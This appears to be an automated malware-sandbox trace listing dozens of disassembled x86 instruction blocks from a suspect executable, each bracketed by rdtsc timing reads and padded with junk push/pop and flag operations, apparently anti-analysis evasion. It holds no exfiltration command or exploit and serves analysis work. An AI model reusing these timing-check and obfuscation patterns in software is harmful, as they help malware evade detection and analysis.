Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1793099 second address: 17930C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B4Dh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jmp 00007FEA75194B54h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17930C5 second address: 17930D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A01D2 second address: 17A01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A01D8 second address: 17A01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FEA75199F66h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75199F75h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A01FC second address: 17A0212 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a popad 0x0000000b push ecx 0x0000000c js 00007FEA75194B4Eh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DFB55 second address: 16DFB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A38C6 second address: 17A38CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A38CE second address: 17A38E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jbe 00007FEA75199F66h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A38E1 second address: 17A38E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B134B second address: 17B136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEA75199F75h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B136A second address: 17B136E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B70E1 second address: 17B70FF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA75199F66h 0x00000008 jc 00007FEA75199F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FEA75199F6Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B70FF second address: 17B7104 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B7104 second address: 17B710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409AB second address: 71409DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEA75199F77h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409DD second address: 71409E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409E3 second address: 71409E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409E7 second address: 7140AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, eax 0x0000000c pushfd 0x0000000d jmp 00007FEA75194B58h 0x00000012 sbb eax, 0511B3A8h 0x00000018 jmp 00007FEA75194B4Bh 0x0000001d popfd 0x0000001e popad 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007FEA75194B54h 0x00000026 pushfd 0x00000027 jmp 00007FEA75194B52h 0x0000002c and eax, 345D2138h 0x00000032 jmp 00007FEA75194B4Bh 0x00000037 popfd 0x00000038 popad 0x00000039 lea eax, dword ptr [ebp-10h] 0x0000003c pushad 0x0000003d push eax 0x0000003e mov ah, dl 0x00000040 pop esi 0x00000041 pushfd 0x00000042 jmp 00007FEA75194B4Dh 0x00000047 adc eax, 760E57D6h 0x0000004d jmp 00007FEA75194B51h 0x00000052 popfd 0x00000053 popad 0x00000054 nop 0x00000055 jmp 00007FEA75194B4Eh 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FEA75194B4Eh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140AF5 second address: 7140B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140B07 second address: 7140BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b jmp 00007FEA75194B4Dh 0x00000010 pushfd 0x00000011 jmp 00007FEA75194B50h 0x00000016 or ax, 4F78h 0x0000001b jmp 00007FEA75194B4Bh 0x00000020 popfd 0x00000021 popad 0x00000022 test edi, edi 0x00000024 pushad 0x00000025 call 00007FEA75194B54h 0x0000002a jmp 00007FEA75194B52h 0x0000002f pop esi 0x00000030 pushfd 0x00000031 jmp 00007FEA75194B4Bh 0x00000036 xor esi, 08282C9Eh 0x0000003c jmp 00007FEA75194B59h 0x00000041 popfd 0x00000042 popad 0x00000043 js 00007FEAE2E53670h 0x00000049 pushad 0x0000004a mov bx, cx 0x0000004d movzx eax, bx 0x00000050 popad 0x00000051 mov eax, dword ptr [ebp-0Ch] 0x00000054 pushad 0x00000055 mov edx, 2E839C44h 0x0000005a mov bl, 38h 0x0000005c popad 0x0000005d mov dword ptr [esi+04h], eax 0x00000060 pushad 0x00000061 mov ebx, ecx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushfd 0x00000066 jmp 00007FEA75194B4Ch 0x0000006b adc al, FFFFFFF8h 0x0000006e jmp 00007FEA75194B4Bh 0x00000073 popfd 0x00000074 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140BD7 second address: 7140C93 instructions: 0x00000000 rdtsc 0x00000002 call 00007FEA75199F78h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e jmp 00007FEA75199F71h 0x00000013 push 00000001h 0x00000015 jmp 00007FEA75199F6Eh 0x0000001a nop 0x0000001b jmp 00007FEA75199F70h 0x00000020 push eax 0x00000021 jmp 00007FEA75199F6Bh 0x00000026 nop 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ecx, ebx 0x0000002b push ebx 0x0000002c pop ecx 0x0000002d popad 0x0000002e popad 0x0000002f lea eax, dword ptr [ebp-08h] 0x00000032 pushad 0x00000033 call 00007FEA75199F75h 0x00000038 pushad 0x00000039 popad 0x0000003a pop ecx 0x0000003b mov bx, AB42h 0x0000003f popad 0x00000040 push ecx 0x00000041 jmp 00007FEA75199F76h 0x00000046 mov dword ptr [esp], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FEA75199F77h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140CBB second address: 7140CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140CCD second address: 7140D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007FEA75199F77h 0x0000000f test edi, edi 0x00000011 pushad 0x00000012 mov edi, esi 0x00000014 movzx esi, bx 0x00000017 popad 0x00000018 js 00007FEAE2E58928h 0x0000001e jmp 00007FEA75199F73h 0x00000023 mov eax, dword ptr [ebp-04h] 0x00000026 jmp 00007FEA75199F76h 0x0000002b mov dword ptr [esi+08h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D32 second address: 7140D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D36 second address: 7140D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D3A second address: 7140D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D40 second address: 7140D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F72h 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebx+70h] 0x00000011 jmp 00007FEA75199F6Ch 0x00000016 push 00000001h 0x00000018 pushad 0x00000019 mov dx, si 0x0000001c mov si, CB19h 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FEA75199F6Bh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D83 second address: 7140D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D89 second address: 7140E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FEA75199F6Ch 0x0000000f pushfd 0x00000010 jmp 00007FEA75199F72h 0x00000015 adc ah, 00000008h 0x00000018 jmp 00007FEA75199F6Bh 0x0000001d popfd 0x0000001e popad 0x0000001f nop 0x00000020 jmp 00007FEA75199F76h 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 jmp 00007FEA75199F70h 0x0000002d nop 0x0000002e jmp 00007FEA75199F70h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov cx, 9DE3h 0x0000003b mov si, 353Fh 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140E0A second address: 7140E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75194B4Bh 0x00000008 call 00007FEA75194B58h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov esi, 39025EE9h 0x0000001a pushfd 0x0000001b jmp 00007FEA75194B56h 0x00000020 jmp 00007FEA75194B55h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140E6B second address: 7140E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140E8F second address: 7140E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140E95 second address: 7140F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c mov dl, al 0x0000000e movsx ebx, cx 0x00000011 popad 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 call 00007FEA75199F76h 0x0000001a mov esi, 55D25631h 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007FEA75199F77h 0x00000026 xor ax, 6D9Eh 0x0000002b jmp 00007FEA75199F79h 0x00000030 popfd 0x00000031 popad 0x00000032 js 00007FEAE2E58711h 0x00000038 jmp 00007FEA75199F6Eh 0x0000003d mov eax, dword ptr [ebp-14h] 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FEA75199F77h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140F34 second address: 7140FEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c call 00007FEA75194B4Ch 0x00000011 mov bx, cx 0x00000014 pop eax 0x00000015 movsx edx, cx 0x00000018 popad 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c jmp 00007FEA75194B56h 0x00000021 mov edx, 74E806ECh 0x00000026 jmp 00007FEA75194B50h 0x0000002b sub eax, eax 0x0000002d jmp 00007FEA75194B51h 0x00000032 lock cmpxchg dword ptr [edx], ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007FEA75194B53h 0x0000003e pushfd 0x0000003f jmp 00007FEA75194B58h 0x00000044 sbb esi, 380BD2A8h 0x0000004a jmp 00007FEA75194B4Bh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140FEF second address: 7141007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141007 second address: 714100B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714100B second address: 7141073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a mov esi, edi 0x0000000c push ebx 0x0000000d call 00007FEA75199F74h 0x00000012 pop esi 0x00000013 pop edi 0x00000014 popad 0x00000015 test eax, eax 0x00000017 jmp 00007FEA75199F6Eh 0x0000001c jne 00007FEAE2E58603h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FEA75199F6Eh 0x00000029 adc eax, 07CBB9C8h 0x0000002f jmp 00007FEA75199F6Bh 0x00000034 popfd 0x00000035 mov ch, 53h 0x00000037 popad 0x00000038 mov edx, dword ptr [ebp+08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141073 second address: 7141077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141077 second address: 714107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714107D second address: 7141085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141085 second address: 71410CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi] 0x00000009 pushad 0x0000000a mov cx, 5D1Fh 0x0000000e popad 0x0000000f mov dword ptr [edx], eax 0x00000011 pushad 0x00000012 mov bh, EDh 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+04h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FEA75199F70h 0x0000001f sub cl, FFFFFFB8h 0x00000022 jmp 00007FEA75199F6Bh 0x00000027 popfd 0x00000028 mov cx, 7DEFh 0x0000002c popad 0x0000002d mov dword ptr [edx+04h], eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71410CB second address: 71410E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+08h] 0x0000000a jmp 00007FEA75194B4Bh 0x0000000f mov dword ptr [edx+08h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71410E9 second address: 71410ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71410ED second address: 7141108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141108 second address: 714110D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714110D second address: 714114A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 5B8EA5A8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+0Ch] 0x0000000f jmp 00007FEA75194B57h 0x00000014 mov dword ptr [edx+0Ch], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FEA75194B50h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714114A second address: 7141159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141159 second address: 7141171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141171 second address: 71411C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, A486h 0x00000015 pushfd 0x00000016 jmp 00007FEA75199F77h 0x0000001b sub cx, 7B0Eh 0x00000020 jmp 00007FEA75199F79h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71411C4 second address: 71411CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71411CA second address: 71411CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412B0 second address: 71412B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412B6 second address: 71412BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412BA second address: 71412DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412DC second address: 71412F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412F7 second address: 714131A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714131A second address: 7141360 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 call 00007FEA75199F6Eh 0x0000000d pop esi 0x0000000e pop edi 0x0000000f popad 0x00000010 mov eax, dword ptr [esi+20h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FEA75199F6Ch 0x0000001a sub cl, 00000048h 0x0000001d jmp 00007FEA75199F6Bh 0x00000022 popfd 0x00000023 mov ax, 38BFh 0x00000027 popad 0x00000028 mov dword ptr [edx+20h], eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141360 second address: 7141364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141364 second address: 71413AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FEA75199F74h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 jmp 00007FEA75199F70h 0x00000018 mov dword ptr [edx+24h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007FEA75199F6Dh 0x00000023 pop ecx 0x00000024 mov bh, 30h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71413AD second address: 71413DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA75194B55h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71413DE second address: 714143E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA75199F77h 0x00000009 or cl, 0000000Eh 0x0000000c jmp 00007FEA75199F79h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [edx+28h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007FEA75199F79h 0x00000022 pop esi 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714143E second address: 71414B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c jmp 00007FEA75194B50h 0x00000011 mov dword ptr [edx+2Ch], ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FEA75194B4Ch 0x0000001c sbb ax, DC48h 0x00000021 jmp 00007FEA75194B4Bh 0x00000026 popfd 0x00000027 mov bx, si 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d pushfd 0x0000002e jmp 00007FEA75194B52h 0x00000033 jmp 00007FEA75194B55h 0x00000038 popfd 0x00000039 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71414B3 second address: 714150A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ax, word ptr [esi+30h] 0x00000009 jmp 00007FEA75199F6Dh 0x0000000e mov word ptr [edx+30h], ax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FEA75199F73h 0x0000001b adc eax, 7F50514Eh 0x00000021 jmp 00007FEA75199F79h 0x00000026 popfd 0x00000027 mov ecx, 64AA3157h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714150A second address: 7141532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FEA75194B4Fh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ax, word ptr [esi+32h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ecx, 046B2737h 0x0000001b mov al, FFh 0x0000001d popad 0x0000001e rdtsc
